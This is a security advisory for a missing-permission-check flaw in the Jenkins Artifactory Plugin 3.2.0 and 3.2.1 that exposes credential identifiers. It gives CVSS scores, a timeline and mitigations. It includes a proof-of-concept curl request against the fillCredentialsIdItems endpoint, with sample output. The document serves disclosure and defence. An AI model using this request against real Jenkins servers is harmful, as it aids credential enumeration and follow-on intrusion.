4 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:S/C:P/I:N/A:N
4.3 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
0.011 Low
EPSS
Percentile
84.4%
An exploitable information disclosure vulnerability exists in the fillCredentialsIdItems
endpoint of the Jenkins Artifactory Plugin 3.2.0 and 3.2.1. As a result of this vulnerability a crafted HTTP request from a user with Overall/Read permissions - such as an anonymous user, if enabled - can cause affected versions of this plugin to disclose credential identifiers from the Jenkins credentials database.
The result of this vulnerability is low level information disclosure which may be used in conjunction with previously reported vulnerabilities; such as those covered in TALOS-2019-0787.
Jenkins Artifactory Plugin 3.2.1 Jenkins Artifactory Plugin 3.2.0
<https://www.jfrog.com/confluence/display/RTF/Jenkins+Artifactory+Plug-in> <https://github.com/jenkinsci/artifactory-plugin>
4.3 - AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
CWE-285: Improper Authorization
The Jenkins Artifactory Plugin brings Artifactoryβs Build Integration support to Jenkins.
This vulnerability exists in the fillCredentialsIdItems
endpoint exposed by the doFillCredentialsIdItems
method of org.jfrog.hudson.ArtifactoryBuilder
due to missing Jenkins permissions check. The result of this vulnerability is low level information disclosure. This information may be useful for an attacker as it may be used in conjunction with additional vulnerabilities in this, or other, Jenkins plugins (see TALOS-2019-0787).
# List username / password credentials on target Jenkins instance.
$ curl -s -X GET -G \
-d 'pretty=true' \
'http://jenkins.docker.local:8080/descriptorByName/org.jfrog.hudson.ArtifactoryBuilder/fillCredentialsIdItems'
{
"_class": "com.cloudbees.plugins.credentials.common.StandardListBoxModel",
"values": [
{
"name": "- none -",
"selected": false,
"value": ""
},
{
"name": "BBBBBB/****** (ExampleOnly)",
"selected": false,
"value": "01e367ef-54fb-4da0-8044-5112935037bb"
},
{
"name": "SecureUsername/****** (Credentials for X)",
"selected": false,
"value": "287fcbe2-177e-4108-ac58-efdc0a507376"
}
]
}
Until such time that the vendor produces a patched version, this plugin should be disabled (if possible), or unnecessary users with Overall/Read permissions removed (such as anonymous access).
Discovered by Peter Adkins of Cisco Umbrella.
2019-03-12 - Vendor Disclosure
2019-05-28 - Vendor Patched
2019-06-04 - Public Release
4 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:S/C:P/I:N/A:N
4.3 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
0.011 Low
EPSS
Percentile
84.4%